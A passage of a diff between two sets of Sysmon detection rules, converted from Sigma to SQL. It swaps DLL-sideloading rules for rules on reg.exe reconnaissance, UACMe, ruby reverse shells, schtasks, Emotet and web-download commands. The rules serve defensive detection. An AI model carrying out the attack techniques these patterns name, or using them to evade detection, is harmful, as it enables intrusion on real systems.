[ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenote.exe' ESCAPE '\\' OR Image LIKE '%\\\\onenoteim.exe' ESCAPE '\\' OR Image LIKE '%\\\\outlook.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\winword.exe' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\assembly\\\\GAC\\_MSIL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE '%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_office_dotnet_gac_dll_load.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "Potential DCOM InternetExplorer.Application DLL Hijack - Image Load", - "id": "f354eba5-623b-450f-b073-0b5b2773b6aa", + "title": "Potential Configuration And Service Reconnaissance Via Reg.EXE", + "id": "970007b7-ce32-49d0-a4a4-fbef016950bd", "status": "test", - "description": "Detects potential DLL hijack of \"iertutil.dll\" found in the DCOM InternetExplorer.Application Class", - "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR), wagga", + "description": "Detects the usage of \"reg.exe\" in order to query reconnaissance information from the registry. Adversaries may interact with the Windows registry to gather information about credentials, the system, configuration, and installed software.", + "author": "Timur Zinniatullin, oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1021.003" + "attack.discovery", + "attack.t1012", + "attack.t1007" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\Internet Explorer\\\\iertutil.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%query%' ESCAPE '\\' AND (CommandLine LIKE '%currentVersion\\\\windows%' ESCAPE '\\' OR CommandLine LIKE '%winlogon\\\\%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\shellServiceObjectDelayLoad%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentVersion\\\\policies\\\\explorer\\\\run%' ESCAPE '\\' OR CommandLine LIKE '%currentcontrolset\\\\services%' ESCAPE '\\'))" ], - "filename": "image_load_dcom_iertutil_dll_hijack.yml" + "filename": "proc_creation_win_reg_query_registry.yml" }, { - "title": "UAC Bypass With Fake DLL", - "id": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "status": "test", - "description": "Attempts to load dismcore.dll after dropping it", - "author": "oscd.community, Dmitry Uchakin", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", + "status": "experimental", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" + "attack.t1548.002" ], "falsepositives": [ - "Actions of a legitimate telnet client" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\dism.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\dismcore.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\Dism\\\\dismcore.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_via_dism.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "Potential DLL Sideloading Via JsSchHlp", - "id": "68654bf0-4412-43d5-bfe8-5eaa393cd939", + "title": "Ruby Inline Command Execution", + "id": "20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8", "status": "experimental", - "description": "Detects potential DLL sideloading using JUSTSYSTEMS Japanese word processor", - "author": "frack113", + "description": "Detects execution of ruby using the \"-e\" flag. This is could be used as a way to launch a reverse shell or execute live ruby code.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1059" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\JSESPR.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\Justsystem\\\\JsSchHlp\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ruby.exe' ESCAPE '\\' OR OriginalFileName = 'ruby.exe') AND CommandLine LIKE '% -e%' ESCAPE '\\')" ], - "filename": "image_load_side_load_jsschhlp.yml" + "filename": "proc_creation_win_ruby_inline_command_execution.yml" }, { - "title": "Fax Service DLL Search Order Hijack", - "id": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "status": "test", - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. An attacker can then (side)load their own malicious DLL using this service.", - "author": "NVISO", + "title": "Suspicious Schtasks Schedule Type With High Privileges", + "id": "7a02e22e-b885-4404-b38b-1ddc7e65258a", + "status": "experimental", + "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" + "attack.execution", + "attack.t1053.005" ], "falsepositives": [ - "Unlikely" + "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fxssvc.exe' ESCAPE '\\' AND ImageLoaded LIKE '%ualapi.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR OriginalFileName = 'schtasks.exe') AND (CommandLine LIKE '% ONLOGON %' ESCAPE '\\' OR CommandLine LIKE '% ONSTART %' ESCAPE '\\' OR CommandLine LIKE '% ONCE %' ESCAPE '\\' OR CommandLine LIKE '% ONIDLE %' ESCAPE '\\') AND (CommandLine LIKE '%NT AUT%' ESCAPE '\\' OR CommandLine LIKE '% SYSTEM%' ESCAPE '\\' OR CommandLine LIKE '%HIGHEST%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_ualapi.yml" + "filename": "proc_creation_win_schtasks_schedule_type_system.yml" }, { - "title": "Microsoft Office DLL Sideload", - "id": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", + "title": "Modify Group Policy Settings", + "id": "ada4b0c4-758b-46ac-9033-9004613a150d", "status": "experimental", - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard location", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.persistence", "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1484.001" ], "falsepositives": [ - "Unlikely" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\outllib.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\Root\\\\OFFICE%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND CommandLine LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (CommandLine LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR CommandLine LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR CommandLine LIKE '%EnableSmartScreen%' ESCAPE '\\' OR CommandLine LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" ], - "filename": "image_load_side_load_office_dlls.yml" + "filename": "proc_creation_win_reg_modify_group_policy_settings.yml" }, { - "title": "PowerShell Core DLL Loaded By Non PowerShell Process", - "id": "092bc4b9-3d1d-43b4-a6b4-8c8acd83522f", - "status": "experimental", - "description": "Detects loading of essential DLLs used by PowerShell, but not by the process powershell.exe. Detects behaviour similar to meterpreter's \"load powershell\" extension.", - "author": "Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton", + "title": "Whoami Utility Execution", + "id": "e28a5a99-da44-436d-b7a0-2afc20a5f413", + "status": "test", + "description": "Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.t1059.001", - "attack.execution" + "attack.discovery", + "attack.t1033", + "car.2016-03-001" ], "falsepositives": [ - "Used by some .NET binaries, minimal on user workstation.", - "Used by Microsoft SQL Server Management Studio" + "Admin activity", + "Scripts and administrative tools used in the monitored environment", + "Monitoring activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\System.Management.Automation.Dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\System.Management.Automation.ni.Dll' ESCAPE '\\') AND NOT (((Image LIKE 'C:\\\\Windows\\\\System32\\\\dsac.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\PowerShell\\\\7\\\\pwsh.exe' ESCAPE '\\') OR (Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\mscorsvw.exe' ESCAPE '\\' OR Image LIKE '%\\\\WINDOWS\\\\System32\\\\RemoteFXvGPUDisablement.exe' ESCAPE '\\' OR Image LIKE '%\\\\sqlps.exe' ESCAPE '\\' OR Image LIKE '%\\\\wsmprovhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrshost.exe' ESCAPE '\\' OR Image LIKE '%\\\\syncappvpublishingserver.exe' ESCAPE '\\' OR Image LIKE '%\\\\runscripthelper.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServerManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\Microsoft SQL Server Management Studio %\\\\Common%\\\\IDE\\\\Ssms.exe' ESCAPE '\\' OR Image LIKE '%\\\\IDE\\\\devenv.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.VSDetouredHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.SettingsHost.exe' ESCAPE '\\' OR Image LIKE '%\\\\ServiceHub.Host.CLR.x86.exe' ESCAPE '\\' OR Image LIKE '%\\\\Citrix\\\\ConfigSync\\\\ConfigSyncRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\' AND (Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\')) OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\whoami.exe' ESCAPE '\\' OR OriginalFileName = 'whoami.exe'))" ], - "filename": "image_load_dll_system_management_automation_susp_load.yml" + "filename": "proc_creation_win_whoami_execution.yml" }, { - "title": "Suspicious Volume Shadow Copy Vsstrace.dll Load", - "id": "48bfd177-7cf2-412b-ad77-baf923489e82", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", "status": "experimental", - "description": "Detects the image load of VSS DLL by uncommon executables", - "author": "frack113", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Temp\\\\{%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND CommandLine LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND NOT ((ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\') OR ((ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Microsoft\\\\Edge\\\\%' ESCAPE '\\'))))" ], - "filename": "image_load_dll_vsstrace_susp_load.yml" + "filename": "proc_creation_win_rundll32_no_params.yml" }, { - "title": "Potential DLL Sideloading Via ClassicExplorer32.dll", - "id": "caa02837-f659-466f-bca6-48bde2826ab4", + "title": "Fsutil Drive Enumeration", + "id": "63de06b9-a385-40b5-8b32-73f2b9ef84b6", "status": "experimental", - "description": "Detects potential DLL sideloading using ClassicExplorer32.dll from the Classic Shell software", - "author": "frack113", + "description": "Attackers may leverage fsutil to enumerated connected drives.", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io'", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.discovery", + "attack.t1120" ], "falsepositives": [ - "Unknown" + "Certain software or administrative tasks may trigger false positives." ], - "level": "medium", + "level": "low", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\ClassicExplorer32.dll' ESCAPE '\\' AND NOT (ImageLoaded LIKE 'C:\\\\Program Files\\\\Classic Shell\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND CommandLine LIKE '%drives%' ESCAPE '\\')" ], - "filename": "image_load_side_load_classicexplorer32.yml" + "filename": "proc_creation_win_fsutil_drive_enumeration.yml" }, { - "title": "Pingback Backdoor DLL Loading Activity", - "id": "35a7dc42-bc6f-46e0-9f83-81f8e56c8d4b", - "status": "experimental", - "description": "Detects the use of Pingback backdoor that creates ICMP tunnel for C2 as described in the trustwave report", - "author": "Bhabesh Raj", + "title": "Potential Emotet Rundll32 Execution", + "id": "54e57ce3-0672-46eb-a402-2c0948d5e3e9", + "status": "test", + "description": "Detecting Emotet DLL loading by looking for rundll32.exe processes with command lines ending in ,RunDLL or ,Control_RunDLL", + "author": "FPT.EagleEye", "tags": [ - "attack.persistence", - "attack.t1574.001" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msdtc.exe' ESCAPE '\\' AND ImageLoaded LIKE 'C:\\\\Windows\\\\oci.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE') AND (CommandLine LIKE '%,RunDLL' ESCAPE '\\' OR CommandLine LIKE '%,Control\\_RunDLL' ESCAPE '\\')) AND NOT (((CommandLine LIKE '%.dll,Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll\",Control\\_RunDLL' ESCAPE '\\' OR CommandLine LIKE '%.dll'',Control\\_RunDLL' ESCAPE '\\')) OR (ParentImage LIKE '%\\\\tracker.exe' ESCAPE '\\')))" ], - "filename": "image_load_malware_pingback_backdoor.yml" + "filename": "proc_creation_win_malware_emotet_rundll32_execution.yml" }, { - "title": "Amsi.DLL Load By Uncommon Process", - "id": "facd1549-e416-48e0-b8c4-41d7215eedc8", - "status": "experimental", - "description": "Detects loading of Amsi.dll by uncommon processes", - "author": "frack113", + "title": "AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl", + "id": "074e0ded-6ced-4ebd-8b4d-53f55908119d", + "status": "test", + "description": "Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed)", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1216" ], "falsepositives": [ - "Likely" + "Unlikely" ], - "level": "low", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' AND NOT (((Image LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\ngentask.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%winrm%' ESCAPE '\\' AND (CommandLine LIKE '%format:pretty%' ESCAPE '\\' OR CommandLine LIKE '%format:\"pretty\"%' ESCAPE '\\' OR CommandLine LIKE '%format:\"text\"%' ESCAPE '\\' OR CommandLine LIKE '%format:text%' ESCAPE '\\') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\')))" ], - "filename": "image_load_dll_amsi_uncommon_process.yml" + "filename": "proc_creation_win_winrm_awl_bypass.yml" }, { - "title": "WMI Modules Loaded", - "id": "671bb7e3-a020-4824-a00e-2ee5b55f385e", + "title": "Usage Of Web Request Commands And Cmdlets", + "id": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", "status": "test", - "description": "Detects non wmiprvse loading WMI modules", - "author": "Roberto Rodriguez @Cyb3rWard0g", + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine", + "author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger", "tags": [ "attack.execution", - "attack.t1047" + "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." ], - "level": "informational", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WmiApRpl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WMINet\\_Utils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fastprox.dll' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR Image LIKE '%\\\\WmiApSrv.exe' ESCAPE '\\' OR Image LIKE '%\\\\svchost.exe' ESCAPE '\\' OR Image LIKE '%\\\\DeviceCensus.exe' ESCAPE '\\' OR Image LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' OR Image LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' OR Image LIKE '%\\\\SIHClient.exe' ESCAPE '\\' OR Image LIKE '%\\\\ngentask.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\taskhostw.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\MoUsoCoreWorker.exe' ESCAPE '\\' OR Image LIKE '%\\\\windows\\\\system32\\\\wbem\\\\WMIADAP.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Sysmon64.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Sysmon.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\unsecapp.exe' ESCAPE '\\' OR Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\nvcontainer.exe' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\System32\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR Image LIKE '%\\\\explorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\'))) AND NOT ((Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%Net.WebClient%' ESCAPE '\\' OR CommandLine LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR CommandLine LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR CommandLine LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\'))" ], - "filename": "image_load_wmi_module_load.yml" + "filename": "proc_creation_win_susp_web_request_cmd_and_cmdlets.yml" }, { - "title": "WMI ActiveScriptEventConsumers Activity Via Scrcons.EXE DLL Load", - "id": "b439f47d-ef52-4b29-9a2f-57d8a96cb6b8", - "status": "test", - "description": "Detects signs of the WMI script host process \"scrcons.exe\" loading scripting DLLs which could indciates WMI ActiveScriptEventConsumers EventConsumers activity.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Suspicious Sigverif Execution", + "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "status": "experimental", + "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" + "attack.defense_evasion", + "attack.t1216" ], "falsepositives": [ - "Legitimate event consumers", - "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\scrcons.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemdisp.dll' ESCAPE '\\' OR ImageLoaded LIKE 